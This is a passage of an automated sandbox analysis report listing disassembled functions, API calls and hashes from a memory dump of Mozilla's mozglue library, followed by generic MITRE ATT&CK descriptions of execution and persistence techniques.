free.MOZGLUE(00000000,?,6BA8FBD1), ref: 6BAA20F1

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 27044a021a9a2c7c5504aa14f3b4563c6590cdd4936e70cc0e58f27c26e3bd7f
Instruction ID: 68be6d94fcb04c3f7d5cb23d64ff341fb37d4157c438df645f3b67aa808c51d0
Opcode Fuzzy Hash: 27044a021a9a2c7c5504aa14f3b4563c6590cdd4936e70cc0e58f27c26e3bd7f
Instruction Fuzzy Hash: 2EE0E5355047149BCA209F36980464EBBE9FFC6214B54022AE546C3600DB79E98286E6

Uniqueness

Uniqueness Score: -1.00%

Function 6BA59A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BA59B2C
memcpy.VCRUNTIME140(6BA599CF,00000000,?), ref: 6BA59BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6BA59BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6BA59DE4

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: ae54212bf48bbd9bea97dd2cb8e30ff1d4440aa4c6e9a36468f061efed713a58
Instruction ID: 09ef56cf2b543f503cce7cafc970009979d6a05c354b8357f79011864d189316
Opcode Fuzzy Hash: ae54212bf48bbd9bea97dd2cb8e30ff1d4440aa4c6e9a36468f061efed713a58
Instruction Fuzzy Hash: BAD160B2A002099FDF14CF69C981AAEBBF2FF88314F194529E945AB341D735ED51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6BA637F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BAB145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BA6380A

Part of subcall function 6BA98DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BAB06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BA98DCC

Part of subcall function 6BAA0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BAA138F,?,?,?), ref: 6BAA0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BAA138F,?,?,?), ref: 6BAA0B27
free.MOZGLUE(?,?,?,?,?,6BAA138F,?,?,?), ref: 6BAA0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6BAA0AB5

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 23e8a39e32eef55d4daaa589e0ac1b71a4736f0cb788073e20d9e3f43efcf09f
Instruction ID: 50ba1cd084b13c4c00dc05012c709319ba1723ebf04507053cbdb0472a82c39f
Opcode Fuzzy Hash: 23e8a39e32eef55d4daaa589e0ac1b71a4736f0cb788073e20d9e3f43efcf09f
Instruction Fuzzy Hash: 8B21C4B4A002059BDF14DF68C991BBFB3B6EF85708F14446CD8169B381DB79A981CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6BA5F19B

Part of subcall function 6BA7D850: EnterCriticalSection.KERNEL32(?), ref: 6BA7D904
Part of subcall function 6BA7D850: LeaveCriticalSection.KERNEL32(?), ref: 6BA7D971
Part of subcall function 6BA7D850: memset.VCRUNTIME140(?,00000000,?), ref: 6BA7D97B

mozalloc_abort.MOZGLUE(?), ref: 6BA5F209

Strings

d, xrefs: 6BA5F1F5

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 2f30fc9ab90a8dc98673be40611a3c37a5a1af3c2f87630ec742a7d6af1f6c1a
Instruction ID: b2538a1ba1f6cd1676624b3cba7b005ce4b43c88f74e9dab9f0cb3bf0ee546a3
Opcode Fuzzy Hash: 2f30fc9ab90a8dc98673be40611a3c37a5a1af3c2f87630ec742a7d6af1f6c1a
Instruction Fuzzy Hash: 91113637E4474986DF048F68C9611BEF3A9EF86208B05912DDC49AB212EB36DAC4C380

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6BA6CA26

Part of subcall function 6BA6CAB0: EnterCriticalSection.KERNEL32(?), ref: 6BA6CB49
Part of subcall function 6BA6CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BA6CBB6

mozalloc_abort.MOZGLUE(?), ref: 6BA6CAA2

Strings

d, xrefs: 6BA6CA6C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: b56615727432c1402dcfea12b9e07f14003c1b727d72473eecb623142b5426fa
Instruction ID: 87cf2e221fa64a86928054aa83dbc0e04df37529c6a7e2e14984aa62061d4fdc
Opcode Fuzzy Hash: b56615727432c1402dcfea12b9e07f14003c1b727d72473eecb623142b5426fa
Instruction Fuzzy Hash: 7C11CEB2D1479893DF01DB68C8110BDF3B6EFA6204F459619DC89A7212FB34A5C5C380

Uniqueness

Uniqueness Score: -1.00%

Function 6BA71A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6BA71A6B

Part of subcall function 6BA71AF0: EnterCriticalSection.KERNEL32(?), ref: 6BA71C36

mozalloc_abort.MOZGLUE(?), ref: 6BA71AE7

Strings

d, xrefs: 6BA71AB1

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 54789de807f9a71fd91724df0c979d4a14a29e8d60b959bf89789a0177ab6629
Instruction ID: 7698be9077ced9450c1ca19b5fa1a0884af2fb6246da25b35f0aca7a886531db
Opcode Fuzzy Hash: 54789de807f9a71fd91724df0c979d4a14a29e8d60b959bf89789a0177ab6629
Instruction Fuzzy Hash: C3113635D0835893CF109FA8C8214FEF3B5EF85204F448628DD896B212EB34E5C5C380

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BAD51C8), ref: 6BAB591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6BAB592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6BAB5915

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: bc94b37d49010d22e96c6d12f57aaf7cff20333bc38f1c5d7ece36d785d260d5
Instruction ID: 7f26a52499647d99507e7c9c12a3584a20502b1f70ea363c6d651317b89b2940
Opcode Fuzzy Hash: bc94b37d49010d22e96c6d12f57aaf7cff20333bc38f1c5d7ece36d785d260d5
Instruction Fuzzy Hash: AEE01A30108340BBDF005B68C91874ABBE8BB57725F488649F6B993691C7B9A8C187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA550E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C,?,?,?,?,?), ref: 6BA5510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C,?,?,?,?,?), ref: 6BA55167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6BA55196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C), ref: 6BA55234

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: fc7aa7099dc40306f0a6d75665dd2aa40244df3d8deda90ea56ab6cdd27b7046
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 8191BB36904606CFCF14CF08C490A5ABBA2BF89318B298589ED499F315D735FD92CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA908F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90918
LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA909A6
EnterCriticalSection.KERNEL32(6BADE7DC,?,00000000), ref: 6BA909F3
LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90ACB

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9b6266c3734ea37ca8be118f5edbd13244036103908b0f8cda46d17953e44bf0
Instruction ID: eda139ef4f6cf2fbd036417ff07a0eec2376c93815755a852c5717e6be08d80a
Opcode Fuzzy Hash: 9b6266c3734ea37ca8be118f5edbd13244036103908b0f8cda46d17953e44bf0
Instruction Fuzzy Hash: 98512E32724714CFEF18AA19E40462A73E1EBC1FA0719817DDD6597B80DB39E8C297C1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BA8E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BAB5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BA8E56A,?,|UrlbarCSSSpan), ref: 6BAB5A5C
free.MOZGLUE(?), ref: 6BAB5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BAB5B9D

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 4b530bad91349bda2aed02e2d2f4ce0360b6f3a4d50c42667f760f0eb614b675
Instruction ID: 2117abe58638a8ea63f439ee37ba7bb7d24fd8aa88563d7baa9b0988e69cb422
Opcode Fuzzy Hash: 4b530bad91349bda2aed02e2d2f4ce0360b6f3a4d50c42667f760f0eb614b675
Instruction Fuzzy Hash: 49516D705087409FDB00CF29C8D471ABBE9FF89318F04C96EE9999B246D778D985CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BA623D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 654c17b2664059a2cfd01e8714d445aa8987a275990506f3dd164a0cb8f7b212
Instruction ID: af3fd59be3b0d96608a289d3f6efe9d4cfe40b8d3b3d68b172e5ed72176b3707
Opcode Fuzzy Hash: 654c17b2664059a2cfd01e8714d445aa8987a275990506f3dd164a0cb8f7b212
Instruction Fuzzy Hash: 37519FB1A00306DFDB04CF18C98478ABBB1FF48354F598269E9199B381E779E991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BAADF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6BA9FF2A), ref: 6BAADFFD

Part of subcall function 6BAA90E0: free.MOZGLUE(?,00000000,?,?,6BAADEDB), ref: 6BAA90FF
Part of subcall function 6BAA90E0: free.MOZGLUE(?,00000000,?,?,6BAADEDB), ref: 6BAA9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6BA9FF2A), ref: 6BAAE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6BA9FF2A), ref: 6BAAE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BA9FF2A), ref: 6BAAE0FE

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 655a11b154765021fb494f595cb8f85c86f4965874d7de8f68acde5f81d2570e
Instruction ID: b782bcda1dce61d35d68d96dea1a6523e0e1b5dc283d2c9c66e0c73f4fbddf0e
Opcode Fuzzy Hash: 655a11b154765021fb494f595cb8f85c86f4965874d7de8f68acde5f81d2570e
Instruction Fuzzy Hash: 3D41FEB16542169FEF14CF68D88036A77B2EB45704F28493EC516EB340E736E981CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BAB61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BAB622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BAB6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAB6292

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 27c5d1685e3960afea12c49e66067fb5550657fc7c3b5457e1641b926043e08b
Instruction ID: af618185b0fc2efbad492e67a8cfcb1f938e52d8fcee3bca3e0dcbcd76aa9e79
Opcode Fuzzy Hash: 27c5d1685e3960afea12c49e66067fb5550657fc7c3b5457e1641b926043e08b
Instruction Fuzzy Hash: FC310871A0460A8FEF04CF2CD8806AAB3E9FB95304F14857AC56AD7351FB35E698C750

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6BBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BA6BCCE

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: c4573db95fd13d225a38a44dda9e4c7c0d5f03a1428fed77abee615a6abb92ae
Instruction ID: f2d981a612906ba136ce1d16346c338cb6470e822410e41f07aa81392866264e
Opcode Fuzzy Hash: c4573db95fd13d225a38a44dda9e4c7c0d5f03a1428fed77abee615a6abb92ae
Instruction Fuzzy Hash: 062128F1A002059BFB008F3DCC8666E72E5EB89384F948B39E956D6351FE74E6C48351

Uniqueness

Uniqueness Score: -1.00%

Function 6BA539A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADE744,6BAB7765,00000000,6BAB7765,?,6BA76112), ref: 6BA539AF
LeaveCriticalSection.KERNEL32(6BADE744,?,6BA76112), ref: 6BA53A34
EnterCriticalSection.KERNEL32(6BADE784,6BA76112), ref: 6BA53A4B
LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53A5F

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: c0b86525775492fe6b743f380ca34f5c6571d8239c77e3e48a02fc42c8101867
Instruction ID: 1e340c73f332fb2259ebffbcc7e4dd1c58ce2206faa98b63d353dc20facb1822
Opcode Fuzzy Hash: c0b86525775492fe6b743f380ca34f5c6571d8239c77e3e48a02fc42c8101867
Instruction Fuzzy Hash: AE212772709B018FCF249F79C455A2AB3E1FFC5750718462DD5A683B80EB39E982CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BA6B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6BA6B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BA6B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA6B9B9

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 6492d68ae231508750e1bfa28e5f06a102cf5b193d6b34c4321f7b492df27d90
Instruction ID: f08a4453377771aa5fe02e89c5ccec432783506cd60abff3575723147d438fd0
Opcode Fuzzy Hash: 6492d68ae231508750e1bfa28e5f06a102cf5b193d6b34c4321f7b492df27d90
Instruction Fuzzy Hash: C61142F1A042059FCB04CF69D88189FB7F9BF98254B14893AE919D3301E735E955CAA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

